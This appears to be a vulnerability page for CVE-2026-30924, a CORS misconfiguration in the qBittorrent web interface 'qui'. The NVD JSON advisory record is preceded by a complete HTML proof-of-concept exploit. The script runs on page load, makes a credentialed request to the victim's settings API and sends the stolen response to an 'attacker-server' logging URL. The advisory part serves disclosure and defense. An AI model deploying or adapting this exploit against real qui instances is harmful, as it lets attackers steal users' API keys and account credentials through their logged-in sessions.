CVE-2026-30924

<!-- Proof of Concept for CVE-2026-30924 --> <!-- This script exploits the misconfigured CORS to steal data --> <!DOCTYPE html> <html> <body> <h2>CVE-2026-30924 PoC</h2> <script> // Replace TARGET_URL with the actual address of the victim's qui instance const TARGET_URL = 'http://victim-qui-host:port/api/v1/settings'; const ATTACKER_LOG_URL = 'http://attacker-server/log'; function exploit() { console.log('Launching exploit...'); fetch(TARGET_URL, { method: 'GET', credentials: 'include', // Critical: Sends cookies with the request headers: { 'Content-Type': 'application/json' } }) .then(response => response.json()) .then(data => { console.log('Exfiltrated data:', data); // Send stolen data to attacker fetch(ATTACKER_LOG_URL + '?data=' + encodeURIComponent(JSON.stringify(data))); }) .catch(error => { console.error('Exploit failed:', error); }); } // Automatically trigger when the victim visits the page window.onload = exploit; </script> </body> </html>

{"cve": {"id": "CVE-2026-30924", "sourceIdentifier": "[email protected]", "published": "2026-03-19T21:17:09.943", "lastModified": "2026-04-23T18:34:20.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "qui is a web interface for managing qBittorrent instances. Versions 1.14.1 and below use a permissive CORS policy that reflects arbitrary origins while also returning Access-Control-Allow-Credentials: true, effectively allowing any external webpage to make authenticated requests on behalf of a logged-in user. An attacker can exploit this by tricking a victim into loading a malicious webpage, which silently interacts with the application using the victim's session and potentially exfiltrating sensitive data such as API keys and account credentials, or even achieving full system compromise through the built-in External Programs manager. Exploitation requires that the victim access the application via a non-localhost hostname and load an attacker-controlled webpage, making highly targeted social-engineering attacks the most likely real-world scenario. This issue was not fixed at the time of publication."}, {"lang": "es", "value": "qui es una interfaz web para gestionar instancias de qBittorrent. Las versiones 1.14.1 e inferiores utilizan una política CORS permisiva que refleja orígenes arbitrarios y también devuelve Access-Control-Allow-Credentials: true, permitiendo efectivamente que cualquier página web externa realice solicitudes autenticadas en nombre de un usuario con sesión iniciada. Un atacante puede explotar esto engañando a una víctima para que cargue una página web maliciosa, la cual interactúa silenciosamente con la aplicación utilizando la sesión de la víctima y potencialmente exfiltrando datos sensibles como claves API y credenciales de cuenta, o incluso logrando un compromiso total del sistema a través del gestor de Programas Externos incorporado. La explotación requiere que la víctima acceda a la aplicación a través de un nombre de host que no sea localhost y cargue una página web controlada por el atacante, lo que convierte los ataques de ingeniería social altamente dirigidos en el escenario más probable en el mundo real. Este problema no fue solucionado en el momento de la publicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-942"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getqui:qui:*:*:*:*:*:docker:*:*", "versionEndExcluding": "1.15.0", "matchCriteriaId": "D24F98B6-7767-40D1-B443-B638E9852327"}]}]}], "references": [{"url": "https://github.com/autobrr/qui/commit/424f7a0de089dce881e8bbecd220163a78e0295f", "source": "[email protected]", "tags": ... (truncated)